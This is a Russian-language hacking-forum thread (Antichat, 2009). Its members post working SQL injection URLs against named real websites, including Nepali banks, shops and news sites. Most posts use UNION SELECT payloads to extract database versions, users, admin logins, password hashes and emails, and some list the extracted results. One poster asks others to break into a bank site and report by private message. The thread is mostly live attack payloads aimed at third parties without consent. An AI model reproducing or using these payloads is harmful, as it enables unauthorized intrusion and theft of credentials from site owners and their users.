ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9891  
Старый 15.06.2009, 17:31
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

Сэкс шоп ёпть
www.eros.by
Код:
http://www.eros.by/index.php?raz=0&ch=16&prod=703'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19--+
5.0.45:h_erotikon@localhost:h_erotikon
в базе ничо интересного =|
ps не подумайте я там не покупал ничо, так мимо проходил
 
Ответить с цитированием

  #9892  
Старый 15.06.2009, 18:12
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543

Репутация: 55
По умолчанию

http://www.transinsular.net/ver_producto.php?id=999999999999999999+union+selec t+1,2,3,4,5/*

http://www.sealquilatodo.com/ver_producto.php?id=9999999999999999999999999+UNIO N+SELECT+1,2,3,4,CONCAT_WS(0x3a,id,usuario,passwor d,nombre,email),6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+FROM+usuarios+limit+0,1--

Шопчег. PR 2.
http://www.hand-ball.net/ver_producto.php?id=-211+union+select+1,version(),3,4,5,6,7,8,9,0,1,12/*

http://www.baladiavalklein.com/english/ver_producto.php?id=-110+union+select+1,2,version(),4,5,6,7,8,9,0,1,2,3 ,14/*

http://www.projectitservices.co.uk/case_studies/details.php?id=-11+union+select+1,2,3,4,5--

PR 5.
http://www.coinsportal.ru/News/Details.php?ID=-229+union+select+1,2,version(),4,5,6--

Последний раз редактировалось molotovkeyt; 15.06.2009 в 18:46..
 
Ответить с цитированием

  #9893  
Старый 15.06.2009, 18:16
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://vsestanki.ru/tech.php?pid=-306+union+select+1,concat_ws(0x3a3a,id,pass,name,e mail,perm),3,4,5,6,7+from+users+--+
ЗЫ наверно в админке проверка ай пи

http://semya.perm.ru/main/news.php?main=1&nid=-213+union+select+1,username,userpass,4,5,6+from+po ll_user+--+

http://www.painter.perm.ru/gallery_short_work.php?id_artist_work=-2636+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a3a,email,login,pass,viewed),12,13,14+from+artis t+limit+2,1+--+
 
Ответить с цитированием

  #9894  
Старый 15.06.2009, 19:29
molotovkeyt
Новичок
Регистрация: 02.11.2008
Сообщений: 25
Провел на форуме:
147543

Репутация: 55
По умолчанию

PR 4.
http://www.calbank.net/newsite/news/details.php?id=-94+union+select+1,version(),3,4,5,6,7,8,9--

PR 4.
http://www.downtownwaukesha.com/member-details.php?ID=-1190+union+select+1,2,3,version(),5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1,2,3,4,5--

SUNRISE BANK LIMITED, NEPAL PR 3.
http://www.sunrisebank.com.np/news-events/details.php?id=-101+union+select+1,2,version(),4,5,6,7,8,9--
4.1.22
нашел только таблицу news. походу только посимвольным брутом колбасить.
господа, кто расковыряет - плз, отпишите в ПМ.

Еще один банк Непала.
DCBL Bank Limited. PR 4.
http://www.dcbl.com.np/news-events/details.php?id=-18+union+select+1,2,version(),4,5,6,7,8,9--
4.1.22

Последний раз редактировалось jokester; 16.06.2009 в 11:27..
 
Ответить с цитированием

  #9895  
Старый 15.06.2009, 21:23
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

Tic300 PR4
http://www.megachip.ru/catalog.php?open_code=-0202+union+select+concat_ws(0x3a3a,login,password, gid)+from+mega_user+where+login=0x61646D696E+--+

http://www.ekperm.ru/main/news.php?menuid=9&section=-88+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,use rname,user_password),9,10,11,12,13+from+phpbb_user s+limit+1,1+--+
 
Ответить с цитированием

  #9896  
Старый 15.06.2009, 22:51
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://ownfl.com/owner.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15
Код:
ownfl02_commish@localhost:ownfl02_ownfl:5.0.67-community
 
Ответить с цитированием

  #9897  
Старый 15.06.2009, 23:14
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://globalbiz.com.np/view_advertisements.php?id=-1+union+select+1,2,concat_Ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12--

5.0.67-community:globalbi_globprs@localhost:globalbi_mygl obal
 
Ответить с цитированием

  #9898  
Старый 15.06.2009, 23:26
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
Отправить сообщение для ..::TROYAN::.. с помощью ICQ
По умолчанию

Код:
http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8%20from%20ecs_admin_user/*
Код:
http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat_ws(0x3a,user(),version(),database()),8/*
root@localhost:5.0.45-community-nt-log:amteore

file_priv:Y
pr:2


godly_ecs@localhost:godly_ecs:4.0.26-standard-log
Цитата:
http://www.bj0808.com/mall/user.php?act=order_query&order_sn=%27%20union%20se lect%201,2,3,4,5,6,concat_ws(0x3a,user(),database( ),version()),8/*
Цитата:
http://www.bj0808.com/mall/user.php?act=order_query&order_sn=%27%20union%20se lect%201,2,3,4,5,6,concat(user_name,0x7c,password, 0x7c,email),8%20from%20ecs_admin_user/*

Последний раз редактировалось ..::TROYAN::..; 15.06.2009 в 23:38..
 
Ответить с цитированием

  #9899  
Старый 16.06.2009, 07:46
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

http://www.rendery.com/goods.php?p=good&t_id=-1+union+select+1,2,concat_Ws(0x3a,version(),user() ,database())/*

4.1.22-standard-log
rendery_root@localhost
rendery_db
 
Ответить с цитированием

  #9900  
Старый 16.06.2009, 08:33
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

Код:
http://linux-muzyka.ixion.pl/tekst.php?id=25047+and+substring(version(),1,1)=5
3-я мускуль:
Код:
http://www.lowiecki.pl/felietony/tekst.php?id=158+and+substring(version(),1,1)=3
Код:
http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user(),database())
4.1.22-logeoplepleasure@node12.cluster.nxs.nleopleple asure
Есть табличка: members

Код:
http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user(),database())
4.1.20:magicus_2@localhost:magicus_tmp_2

Код:
http://trb-res.nl/tekst.php?id=562+and+substring(version(),1,1)=4
Код:
http://www.demo.artframe.nl/tekst.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8/*
4.1.21-standard-log:artframe_demo@localhost:artframe_demo

Код:
http://www.kralen.com/tekst.php?id=173+and+substring(version(),1,1)=4
Код:
http://www.ogledalce.co.rs/tekst.php?id=228+and+substring(version(),1,1)=5

Последний раз редактировалось AlexSatter; 16.06.2009 в 08:56..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ